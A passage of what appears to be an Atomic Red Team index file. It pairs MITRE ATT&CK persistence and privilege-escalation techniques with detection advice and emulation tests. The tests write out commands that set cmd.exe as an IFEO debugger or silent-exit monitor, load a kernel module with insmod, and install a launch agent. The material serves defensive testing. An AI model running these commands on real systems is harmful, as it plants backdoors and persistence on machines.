GPOs.(Citation: Harmj0y SeEnableDelegationPrivilege Right)" + id: attack-pattern--5d2be8b9-d24c-4e98-83bf-2f5f79477163 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2021-02-09T15:52:24.315Z' + created: '2020-12-28T21:50:59.844Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - Administrator + - User + x_mitre_detection: |- + It is possible to detect GPO modifications by monitoring directory service changes using Windows event logs. Several events may be logged for such GPO modifications, including: + + * Event ID 5136 - A directory service object was modified + * Event ID 5137 - A directory service object was created + * Event ID 5138 - A directory service object was undeleted + * Event ID 5139 - A directory service object was moved + * Event ID 5141 - A directory service object was deleted + + + GPO abuse will often be accompanied by some other behavior such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), which will have events associated with it to detect. Subsequent permission value modifications, like those to SeEnableDelegationPrivilege, can also be searched for in events associated with privileges assigned to new logons (Event ID 4672) and assignment of user rights (Event ID 4704). + x_mitre_data_sources: + - 'Active Directory: Active Directory Object Creation' + - 'Active Directory: Active Directory Object Deletion' + - 'Active Directory: Active Directory Object Modification' + - 'Command: Command Execution' + x_mitre_contributors: + - Itamar Mizrahi, Cymptom + - Tristan Bennett, Seamless Intelligence + x_mitre_platforms: + - Windows + atomic_tests: [] + T1574: + technique: + external_references: + - source_name: mitre-attack + external_id: T1574 + url: https://attack.mitre.org/techniques/T1574 + - source_name: Autoruns for Windows + url: https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns + description: Mark Russinovich. (2019, June 28). Autoruns for Windows v13.96. + Retrieved March 13, 2020. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Hijack Execution Flow + description: |- + Adversaries may execute their own malicious payloads by hijacking the way operating systems run programs. Hijacking execution flow can be for the purposes of persistence, since this hijacked execution may reoccur over time. Adversaries may also use these mechanisms to elevate privileges or evade defenses, such as application control or other restrictions on execution. + + There are many ways an adversary may hijack the flow of execution, including by manipulating how the operating system locates programs to be executed. How the operating system locates libraries to be used by a program can also be intercepted. Locations where the operating system looks for programs/resources, such as file directories and in the case of Windows the Registry, could also be poisoned to include malicious payloads. + id: attack-pattern--aedfca76-3b30-4866-b2aa-0f1d7fd1e4b6 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: defense-evasion + modified: '2021-04-27T19:55:20.290Z' + created: '2020-03-12T20:38:12.465Z' + x_mitre_data_sources: + - 'Windows Registry: Windows Registry Key Modification' + - 'Process: Process Creation' + - 'Module: Module Load' + - 'Command: Command Execution' + - 'Service: Service Metadata' + - 'File: File Creation' + - 'File: File Modification' + x_mitre_detection: |- + Monitor file systems for moving, renaming, replacing, or modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared with past behavior) that do not correlate with known software, patches, etc., are suspicious. Monitor DLLs loaded into a process and detect DLLs that have the same file name but abnormal paths. Modifications to or creation of .manifest and .local redirection files that do not correlate with software updates are suspicious. + + Look for changes to binaries and service executables that may normally occur during software updates. If an executable is written, renamed, and/or moved to match an existing service executable, it could be detected and correlated with other suspicious behavior. Hashing of binaries and service executables could be used to detect replacement against historical data. + + Monitor for changes to environment variables, as well as the commands to implement these changes. + + Monitor processes for unusual activity (e.g., a process that does not use the network begins to do so, abnormal process call trees). Track library metadata, such as a hash, and compare libraries that are loaded at process execution time against previous executions to detect differences that do not correlate with patching or updates. + + Service changes are reflected in the Registry. Modification to existing services should not occur frequently. If a service binary path or failure parameters are changed to values that are not typical for that service and does not correlate with software updates, then it may be due to malicious activity. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement. + + Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current service information. (Citation: Autoruns for Windows) Suspicious program execution through services may show up as outlier processes that have not been seen before when compared against historical data. + x_mitre_defense_bypassed: + - Anti-virus + - Application control + x_mitre_version: '1.1' + x_mitre_is_subtechnique: false + x_mitre_platforms: + - Linux + - macOS + - Windows + atomic_tests: [] + T1546.012: + technique: + created: '2020-01-24T15:05:58.384Z' + modified: '2020-11-10T18:29:31.112Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: persistence + type: attack-pattern + id: attack-pattern--6d4a7fb3-5a24-42be-ae61-6728a2b581f6 + description: |- + Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., C:\dbg\ntsd.exe -g notepad.exe). (Citation: Microsoft Dev Blog IFEO Mar 2010) + + IFEOs can be set directly via the Registry or in Global Flags via the GFlags tool. (Citation: Microsoft GFlags Mar 2017) IFEOs are represented as Debugger values in the Registry under HKLM\SOFTWARE{\Wow6432Node}\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ where <executable> is the binary on which the debugger is attached. (Citation: Microsoft Dev Blog IFEO Mar 2010) + + IFEOs can also enable an arbitrary monitor program to be launched when a specified program silently exits (i.e. is prematurely terminated by itself or a second, non kernel-mode process). (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018) Similar to debuggers, silent exit monitoring can be enabled through GFlags and/or by directly modifying IFEO and silent process exit Registry values in HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\. (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018) + + Similar to [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), on Windows Vista and later as well as Windows Server 2008 and later, a Registry key may be modified that configures "cmd.exe," or another program that provides backdoor access, as a "debugger" for an accessibility program (ex: utilman.exe). After the Registry is modified, pressing the appropriate key combination at the login screen while at the keyboard or when connected with [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) will cause the "debugger" program to be executed with SYSTEM privileges. (Citation: Tilbury 2014) + + Similar to [Process Injection](https://attack.mitre.org/techniques/T1055), these values may also be abused to obtain privilege escalation by causing a malicious executable to be loaded and run in the context of separate processes on the computer. (Citation: Elastic Process Injection July 2017) Installing IFEO mechanisms may also provide Persistence via continuous triggered invocation. + + Malware may also use IFEO to [Impair Defenses](https://attack.mitre.org/techniques/T1562) by registering invalid debuggers that redirect and effectively disable various system and security applications. (Citation: FSecure Hupigon) (Citation: Symantec Ushedix June 2008) + name: Image File Execution Options Injection + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1546.012 + url: https://attack.mitre.org/techniques/T1546/012 + - url: https://blogs.msdn.microsoft.com/mithuns/2010/03/24/image-file-execution-options-ifeo/ + description: Shanbhag, M. (2010, March 24). Image File Execution Options (IFEO). + Retrieved December 18, 2017. + source_name: Microsoft Dev Blog IFEO Mar 2010 + - url: https://docs.microsoft.com/windows-hardware/drivers/debugger/gflags-overview + description: Microsoft. (2017, May 23). GFlags Overview. Retrieved December + 18, 2017. + source_name: Microsoft GFlags Mar 2017 + - url: https://docs.microsoft.com/windows-hardware/drivers/debugger/registry-entries-for-silent-process-exit + description: Marshall, D. & Griffin, S. (2017, November 28). Monitoring Silent + Process Exit. Retrieved June 27, 2018. + source_name: Microsoft Silent Process Exit NOV 2017 + - url: https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/ + description: Moe, O. (2018, April 10). Persistence using GlobalFlags in Image + File Execution Options - Hidden from Autoruns.exe. Retrieved June 27, 2018. + source_name: Oddvar Moe IFEO APR 2018 + - url: http://blog.crowdstrike.com/registry-analysis-with-crowdresponse/ + description: Tilbury, C. (2014, August 28). Registry Analysis with CrowdResponse. + Retrieved November 12, 2014. + source_name: Tilbury 2014 + - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process + description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques: + A Technical Survey Of Common And Trending Process Injection Techniques. + Retrieved December 7, 2017.' + source_name: Elastic Process Injection July 2017 + - url: https://www.f-secure.com/v-descs/backdoor_w32_hupigon_emv.shtml + description: FSecure. (n.d.). Backdoor - W32/Hupigon.EMV - Threat Description. + Retrieved December 18, 2017. + source_name: FSecure Hupigon + - url: https://www.symantec.com/security_response/writeup.jsp?docid=2008-062807-2501-99&tabid=2 + description: Symantec. (2008, June 28). Trojan.Ushedix. Retrieved December + 18, 2017. + source_name: Symantec Ushedix June 2008 + x_mitre_platforms: + - Windows + x_mitre_contributors: + - Oddvar Moe, @oddvarmoe + x_mitre_data_sources: + - 'Process: Process Creation' + - 'Windows Registry: Windows Registry Key Modification' + - 'Command: Command Execution' + x_mitre_detection: |- + Monitor for abnormal usage of the GFlags tool as well as common processes spawned under abnormal parents and/or with creation flags indicative of debugging such as DEBUG_PROCESS and DEBUG_ONLY_THIS_PROCESS. (Citation: Microsoft Dev Blog IFEO Mar 2010) + + Monitor Registry values associated with IFEOs, as well as silent process exit monitoring, for modifications that do not correlate with known software, patch cycles, etc. Monitor and analyze application programming interface (API) calls that are indicative of Registry edits such as RegCreateKeyEx and RegSetValueEx. (Citation: Elastic Process Injection July 2017) + x_mitre_permissions_required: + - Administrator + - SYSTEM + x_mitre_is_subtechnique: true + x_mitre_version: '1.1' + identifier: T1546.012 + atomic_tests: + - name: IFEO Add Debugger + auto_generated_guid: fdda2626-5234-4c90-b163-60849a24c0b8 + description: 'Leverage Global Flags Settings + +' + supported_platforms: + - windows + input_arguments: + target_binary: + description: Binary To Attach To + type: Path + default: C:\Windows\System32\calc.exe + payload_binary: + description: Binary To Execute + type: Path + default: C:\Windows\System32\cmd.exe + executor: + command: 'REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image + File Execution Options\#{target_binary}" /v Debugger /d "#{payload_binary}" + +' + cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows + NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v Debugger + /f >nul 2>&1 + +' + name: command_prompt + elevation_required: true + - name: IFEO Global Flags + auto_generated_guid: 46b1f278-c8ee-4aa5-acce-65e77b11f3c1 + description: 'Leverage Global Flags Settings + +' + supported_platforms: + - windows + input_arguments: + target_binary: + description: Binary To Attach To + type: Path + default: C:\Windows\System32\notepad.exe + payload_binary: + description: Binary To Execute + type: Path + default: C:\Windows\System32\cmd.exe + executor: + command: | + REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v GlobalFlag /t REG_DWORD /d 512 + REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\#{target_binary}" /v ReportingMode /t REG_DWORD /d 1 + REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\#{target_binary}" /v MonitorProcess /d "#{payload_binary}" + cleanup_command: | + reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v GlobalFlag /f >nul 2>&1 + reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\#{target_binary}" /v ReportingMode /f >nul 2>&1 + reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\#{target_binary}" /v MonitorProcess /f >nul 2>&1 + name: command_prompt + elevation_required: true + T1547.006: + technique: + external_references: + - source_name: mitre-attack + external_id: T1547.006 + url: https://attack.mitre.org/techniques/T1547/006 + - source_name: Linux Kernel Programming + url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf + description: Pomerantz, O., Salzman, P.. (2003, April 4). The Linux Kernel + Module Programming Guide. Retrieved April 6, 2018. + - url: http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html + description: Pomerantz, O., Salzman, P. (2003, April 4). Modules vs Programs. + Retrieved April 6, 2018. + source_name: Linux Kernel Module Programming Guide + - url: http://www.megasecurity.org/papers/Rootkits.pdf + description: Chuvakin, A. (2003, February). An Overview of Rootkits. Retrieved + April 6, 2018. + source_name: iDefense Rootkit Overview + - source_name: Apple Kernel Extension Deprecation + url: https://developer.apple.com/support/kernel-extensions/ + description: Apple. (n.d.). Deprecated Kernel Extensions and System Extension + Alternatives. Retrieved November 4, 2020. + - url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html + description: 'Case, A. (2012, October 10). Phalanx 2 Revealed: Using Volatility + to Analyze an Advanced Linux Rootkit. Retrieved April 9, 2018.' + source_name: Volatility Phalanx2 + - url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/ + description: Kurtz, G. (2012, November 19). HTTP iframe Injecting Linux Rootkit. + Retrieved December 21, 2017. + source_name: CrowdStrike Linux Rootkit + - url: https://github.com/f0rb1dd3n/Reptile + description: Augusto, I. (2018, March 8). Reptile - LMK Linux rootkit. Retrieved + April 9, 2018. + source_name: GitHub Reptile + - url: https://github.com/m0nad/Diamorphine + description: Mello, V. (2018, March 8). Diamorphine - LMK rootkit for Linux + Kernels 2.6.x/3.x/4.x (x86 and x86_64). Retrieved April 9, 2018. + source_name: GitHub Diamorphine + - url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf + description: Wardle, P. (2015, April). Malware Persistence on OS X Yosemite. + Retrieved April 6, 2018. + source_name: RSAC 2015 San Francisco Patrick Wardle + - url: https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/ + description: Wardle, P. (2017, September 8). High Sierra’s ‘Secure Kernel + Extension Loading’ is Broken. Retrieved April 6, 2018. + source_name: Synack Secure Kernel Extension Broken + - url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/ + description: 'Mikhail, K. (2014, October 16). The Ventir Trojan: assemble + your MacOS spy. Retrieved April 6, 2018.' + source_name: Securelist Ventir + - source_name: Trend Micro Skidmap + url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/ + description: Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux + Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload. + Retrieved June 4, 2020. + - url: http://tldp.org/HOWTO/Module-HOWTO/x197.html + description: Henderson, B. (2006, September 24). How To Insert And Remove + LKMs. Retrieved April 9, 2018. + source_name: Linux Loadable Kernel Module Insert and Remove LKMs + - url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux + description: Wikipedia. (2018, March 17). Loadable kernel module. Retrieved + April 9, 2018. + source_name: Wikipedia Loadable Kernel Module + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Kernel Modules and Extensions + description: |- + Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system. (Citation: Linux Kernel Programming)  + + When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0). (Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors and enabling root access to non-privileged users. (Citation: iDefense Rootkit Overview) + + Kernel extensions, also called kext, are used for macOS to load functionality onto a system similar to LKMs for Linux. They are loaded and unloaded through kextload and kextunload commands. Since macOS Catalina 10.15, kernel extensions have been deprecated on macOS systems.(Citation: Apple Kernel Extension Deprecation) + + Adversaries can use LKMs and kexts to covertly persist on a system and elevate privileges. Examples have been found in the wild and there are some open source projects. (Citation: Volatility Phalanx2) (Citation: CrowdStrike Linux Rootkit) (Citation: GitHub Reptile) (Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle) (Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir) (Citation: Trend Micro Skidmap) + id: attack-pattern--a1b52199-c8c5-438a-9ded-656f1d0888c6 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2021-03-30T00:59:53.716Z' + created: '2020-01-24T17:42:23.339Z' + x_mitre_version: '1.1' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - root + x_mitre_detection: |- + Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands:modprobe, insmod, lsmod, rmmod, or modinfo (Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into /lib/modules and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module) + + For macOS, monitor for execution of kextload commands and correlate with other unknown or suspicious activity. + + Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: apt-get install linux-headers-$(uname -r) On RHEL and CentOS based systems this can be accomplished by running: yum install kernel-devel-$(uname -r) + x_mitre_data_sources: + - 'Command: Command Execution' + - 'File: File Creation' + - 'Kernel: Kernel Module Load' + x_mitre_contributors: + - Wayne Silva, F-Secure Countercept + - Anastasios Pingios + - Jeremy Galloway + - Red Canary + x_mitre_platforms: + - macOS + - Linux + identifier: T1547.006 + atomic_tests: + - name: Linux - Load Kernel Module via insmod + auto_generated_guid: 687dcb93-9656-4853-9c36-9977315e9d23 + description: 'This test uses the insmod command to load a kernel module for + Linux. + +' + supported_platforms: + - linux + input_arguments: + module_name: + description: Name of the kernel module name. + type: string + default: T1547006 + module_path: + description: Folder used to store the module. + type: path + default: "/tmp/T1547.006/T1547006.ko" + temp_folder: + description: Temp folder used to compile the code. + type: path + default: "/tmp/T1547.006" + module_source_path: + description: Path to download Gsecdump binary file + type: url + default: PathToAtomicsFolder/T1547.006/src + dependency_executor_name: bash + dependencies: + - description: 'The kernel module must exist on disk at specified location + +' + prereq_command: 'if [ -f #{module_path} ]; then exit 0; else exit 1; fi; + +' + get_prereq_command: | + if [ ! -d #{temp_folder} ]; then mkdir #{temp_folder}; touch #{temp_folder}/safe_to_delete; fi; + cp #{module_source_path}/* #{temp_folder}/ + cd #{temp_folder}; make + if [ ! -f #{module_path} ]; then mv #{temp_folder}/#{module_name}.ko #{module_path}; fi; + executor: + command: 'sudo insmod #{module_path} + +' + cleanup_command: | + sudo rmmod #{module_name} + [ -f #{temp_folder}/safe_to_delete ] && rm -rf #{temp_folder} + name: bash + elevation_required: true + T1546.006: + technique: + external_references: + - source_name: mitre-attack + external_id: T1546.006 + url: https://attack.mitre.org/techniques/T1546/006 + - url: https://www.blackhat.com/docs/us-15/materials/us-15-Wardle-Writing-Bad-A-Malware-For-OS-X.pdf + description: Patrick Wardle. (2015). Writing Bad @$$ Malware for OS X. Retrieved + July 10, 2017. + source_name: Writing Bad Malware for OSX + - url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf + description: Patrick Wardle. (2015). Malware Persistence on OS X Yosemite. + Retrieved July 10, 2017. + source_name: Malware Persistence on OS X + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: LC_LOAD_DYLIB Addition + description: |- + Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies. (Citation: Writing Bad Malware for OSX) There are tools available to perform these changes. + + Adversaries may modify Mach-O binary headers to load and execute malicious dylibs every time the binary is executed. Although any changes will invalidate digital signatures on binaries because the binary is being modified, this can be remediated by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t checked at load time. (Citation: Malware Persistence on OS X) + id: attack-pattern--10ff21b9-5a01-4268-a1b5-3b55015f1847 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2021-03-30T00:51:58.454Z' + created: '2020-01-24T14:21:52.750Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - User + x_mitre_detection: Monitor processes for those that may be used to modify binary + headers. Monitor file systems for changes to application binaries and invalid + checksums/signatures. Changes to binaries that do not line up with application + updates or patches are also extremely suspicious. + x_mitre_data_sources: + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'File: File Metadata' + - 'File: File Modification' + - 'Module: Module Load' + x_mitre_platforms: + - macOS + atomic_tests: [] + T1547.008: + technique: + created: '2020-01-24T18:38:55.801Z' + modified: '2020-03-25T16:52:26.567Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + type: attack-pattern + id: attack-pattern--f0589bc3-a6ae-425a-a3d5-5659bfee07f4 + description: |- + Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process. (Citation: Microsoft Security Subsystem) + + Adversaries may target LSASS drivers to obtain persistence. By either replacing or adding illegitimate drivers (e.g., [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574)), an adversary can use LSA operations to continuously execute malicious payloads. + name: LSASS Driver + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1547.008 + url: https://attack.mitre.org/techniques/T1547/008 + - url: https://technet.microsoft.com/library/cc961760.aspx + description: Microsoft. (n.d.). Security Subsystem Architecture. Retrieved + November 27, 2017. + source_name: Microsoft Security Subsystem + - url: https://technet.microsoft.com/library/dn408187.aspx + description: Microsoft. (2014, March 12). Configuring Additional LSA Protection. + Retrieved November 27, 2017. + source_name: Microsoft LSA Protection Mar 2014 + - url: https://msdn.microsoft.com/library/windows/desktop/ff919712.aspx + description: Microsoft. (n.d.). Dynamic-Link Library Security. Retrieved November + 27, 2017. + source_name: Microsoft DLL Security + - url: https://technet.microsoft.com/en-us/sysinternals/bb963902 + description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. + Retrieved June 6, 2016. + source_name: TechNet Autoruns + x_mitre_platforms: + - Windows + x_mitre_contributors: + - Vincent Le Toux + x_mitre_data_sources: + - 'Module: Module Load' + - 'Driver: Driver Load' + - 'File: File Modification' + - 'File: File Creation' + x_mitre_detection: "With LSA Protection enabled, monitor the event logs (Events + 3033 and 3063) for failed attempts to load LSA plug-ins and drivers. (Citation: + Microsoft LSA Protection Mar 2014) Also monitor DLL load operations in lsass.exe. + (Citation: Microsoft DLL Security)\n\nUtilize the Sysinternals Autoruns/Autorunsc + utility (Citation: TechNet Autoruns) to examine loaded drivers associated + with the LSA. " + x_mitre_permissions_required: + - SYSTEM + - Administrator + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' + atomic_tests: [] + T1543.001: + technique: + external_references: + - source_name: mitre-attack + external_id: T1543.001 + url: https://attack.mitre.org/techniques/T1543/001 + - url: https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html + description: Apple. (n.d.). Creating Launch Daemons and Agents. Retrieved + July 10, 2017. + source_name: AppleDocs Launch Agent Daemons + - url: https://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/ + description: Marc-Etienne M.Leveille. (2016, July 6). New OSX/Keydnap malware + is hungry for credentials. Retrieved July 3, 2017. + source_name: OSX Keydnap malware + - url: https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/ + description: Thomas Reed. (2017, January 18). New Mac backdoor using antiquated + code. Retrieved July 5, 2017. + source_name: Antiquated Mac Malware + - url: https://blog.malwarebytes.com/threat-analysis/2017/04/new-osx-dok-malware-intercepts-web-traffic/ + description: Thomas Reed. (2017, July 7). New OSX.Dok malware intercepts web + traffic. Retrieved July 10, 2017. + source_name: OSX.Dok Malware + - url: https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/ + description: Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26). + Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017. + source_name: Sofacy Komplex Trojan + - url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf + description: Patrick Wardle. (2014, September). Methods of Malware Persistence + on Mac OS X. Retrieved July 5, 2017. + source_name: Methods of Mac Malware Persistence + - url: https://www.synack.com/wp-content/uploads/2016/03/RSA_OSX_Malware.pdf + description: 'Patrick Wardle. (2016, February 29). Let''s Play Doctor: Practical + OS X Malware Detection & Analysis. Retrieved July 10, 2017.' + source_name: OSX Malware Detection + - url: https://www.alienvault.com/blogs/labs-research/oceanlotus-for-os-x-an-application-bundle-pretending-to-be-an-adobe-flash-update + description: Eddie Lee. (2016, February 17). OceanLotus for OS X - an Application + Bundle Pretending to be an Adobe Flash Update. Retrieved July 5, 2017. + source_name: OceanLotus for OS X + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Launch Agent + description: "Adversaries may create or modify launch agents to repeatedly execute + malicious payloads as part of persistence. Per Apple’s developer documentation, + when a user logs in, a per-user launchd process is started which loads the + parameters for each launch-on-demand user agent from the property list (plist) + files found in /System/Library/LaunchAgents, /Library/LaunchAgents, + and $HOME/Library/LaunchAgents (Citation: AppleDocs Launch Agent + Daemons) (Citation: OSX Keydnap malware) (Citation: Antiquated Mac Malware). + These launch agents have property list files which point to the executables + that will be launched (Citation: OSX.Dok Malware).\n \nAdversaries may install + a new launch agent that can be configured to execute at login by using launchd + or launchctl to load a plist into the appropriate directories (Citation: + Sofacy Komplex Trojan) (Citation: Methods of Mac Malware Persistence). The + agent name may be disguised by using a name from a related operating system + or benign software. Launch Agents are created with user level privileges and + are executed with the privileges of the user when they log in (Citation: OSX + Malware Detection) (Citation: OceanLotus for OS X). They can be set up to + execute when a specific user logs in (in the specific user’s directory structure) + or when any user logs in (which requires administrator privileges)." + id: attack-pattern--d10cbd34-42e3-45c0-84d2-535a09849584 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2020-03-25T22:11:45.513Z' + created: '2020-01-17T16:10:58.592Z' + x_mitre_data_sources: + - 'File: File Creation' + - 'File: File Modification' + - 'Command: Command Execution' + - 'Service: Service Creation' + - 'Service: Service Modification' + x_mitre_detection: Monitor Launch Agent creation through additional plist files + and utilities such as Objective-See’s KnockKnock application. Launch Agents + also require files on disk for persistence which can also be monitored via + other file monitoring applications. + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - Administrator + - User + x_mitre_platforms: + - macOS + identifier: T1543.001 + atomic_tests: + - name: Launch Agent + auto_generated_guid: a5983dee-bf6c-4eaf-951c-dbc1a7b90900 + description: 'Create a plist and execute it + +' + supported_platforms: + - macos + input_arguments: + plist_filename: + description: filename + type: string + default: com.atomicredteam.plist + path_malicious_plist: + description: Name of file to store in cron folder + type: string + default: "$PathToAtomicsFolder/T1543.001/src/atomicredteam_T1543_001.plist" + dependency_executor_name: bash + dependencies: + - description: 'The shared library must exist on disk at specified location + (#{path_malicious_plist}) + +' + prereq_command: 'if [ -f #{path_malicious_plist} ]; then exit 0; else exit + 1; fi; + +' + get_prereq_command: 'echo "The shared library doesn''t exist. Check the path"; + exit 1; + +' + executor: + name: bash + elevation_required: true + command: | + if [ ! -d ~/Library/LaunchAgents ]; then mkdir ~/Library/LaunchAgents; fi; + sudo cp #{path_malicious_plist} ~/Library/LaunchAgents/#{plist_filename} + sudo launchctl load -w ~/Library/LaunchAgents/#{plist_filename} + cleanup: | + sudo launchctl unload ~/Library/LaunchAgents/#{plist_filename} + sudo rm ~/Library/LaunchAgents/#{plist_filename} + T1543.004: + technique: + external_references: + - source_name: mitre-attack + external_id: T1543.004 + url: https://attack.mitre.org/techniques/T1543/004 + - external_id: CAPEC-550 + source_name: capec + url: https://capec.mitre.org/data/definitions/550.html + - external_id: CAPEC-551 + source_name: capec + url: https://capec.mitre.org/data/definitions/551.html + - url: 